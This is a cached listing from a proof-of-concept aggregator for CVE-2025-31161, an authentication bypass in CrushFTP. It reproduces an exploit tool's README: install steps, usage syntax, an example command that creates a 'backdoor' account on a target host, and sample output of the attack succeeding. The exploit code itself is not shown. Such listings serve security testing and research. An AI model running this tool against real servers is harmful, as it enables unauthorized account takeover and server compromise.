Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-31161 PoC — CrushFTP 安全漏洞

Source
https://github.com/zr1p3r/CVE-2025-31161
Associated Vulnerability
Title:CrushFTP 安全漏洞 (CVE-2025-31161)
Description:CrushFTP是CrushFTP公司的一款文件传输服务器。 CrushFTP 10.8.4之前的10.x本和11.3.1之前的11.x版本存在安全漏洞,该漏洞源于认证绕过漏洞,可能导致账户接管。
Description
🛡️ CVE-2025-31161 - CrushFTP User Creation Authentication Bypass Exploit
Readme
# CVE-2025-31161 - CrushFTP User Creation Authentication Bypass Exploit

![CrushFTP Logo](https://www.crushftp.com/assets/img/logo/logo.png)

## 📌 Description

This Python exploit targets **CrushFTP** servers vulnerable to **CVE-2025-31161**. The vulnerability allows **unauthenticated user account creation** by sending a crafted XML payload to the WebInterface, potentially resulting in full server compromise.

---

## ⚠️ Disclaimer

> **This tool is intended for educational and authorized security testing only.**  
> Unauthorized use against systems you do not own or have explicit permission to test is **illegal** and unethical.

---

## 🧰 Requirements

- Python 3
- pip3
- Python modules:
  - `requests`
  - `colorama`

### ✅ Install Python3 and pip3

**Debian/Ubuntu:**

```bash
sudo apt update
sudo apt install python3 python3-pip -y
````

**CentOS/RHEL:**

```bash
sudo yum install python3 python3-pip -y
```

**macOS (with Homebrew):**

```bash
brew install python3
```

### ✅ Install Python dependencies

```bash
pip3 install requests colorama
```

---

## 🔧 Usage

```bash
python3 CVE-2025-31161.py --target_host <TARGET_IP> [--port <PORT>] [--target_user <ADMIN>] [--new_user <USERNAME>] [--password <PASSWORD>]
```

### 🔍 Example

```bash
python3 CVE-2025-31161.py --target_host 192.168.1.100 --new_user backdoor --password P@ssw0rd!
```

---

## 🧪 Command-Line Options

| Argument        | Description                           | Default Value               |
| --------------- | ------------------------------------- | --------------------------- |
| `--target_host` | **(Required)** IP or domain of target | —                           |
| `--port`        | Port of CrushFTP WebInterface         | `8080`                      |
| `--target_user` | Admin username (used in payload)      | `crushadmin`                |
| `--new_user`    | Username for new unauthorized account | `AuthBypassAccount`         |
| `--password`    | Password for the new user             | `CorrectHorseBatteryStaple` |

---

## 🖥️ Sample Output

```
[+] Preparing Payloads
  [-] Warming up the target...
  [-] Target is up and running
[+] Sending Account Create Request
  [!] User created successfully!

[+] Exploit Complete! You can now login with:
   [*] Username: AuthBypassAccount
   [*] Password: CorrectHorseBatteryStaple
```

---

## 👨‍💻 Author

**Gaurav Bhattacharjee** (`G4UR4V007`)

---

## 📄 License

This project is licensed under the [MIT License](https://github.com/0xgh057r3c0n/CVE-2025-31161/blob/main/LICENSE).
---
File Snapshot

 [4.0K]  /data/pocs/8f3c3fb2569ca696f04e0431e371aefd8592bed4
├── [5.5K]  CVE-2025-31161.py
├── [2.5K]  CVE-2025-31161.yaml
├── [1.1K]  LICENSE
└── [2.5K]  README.md

1 directory, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.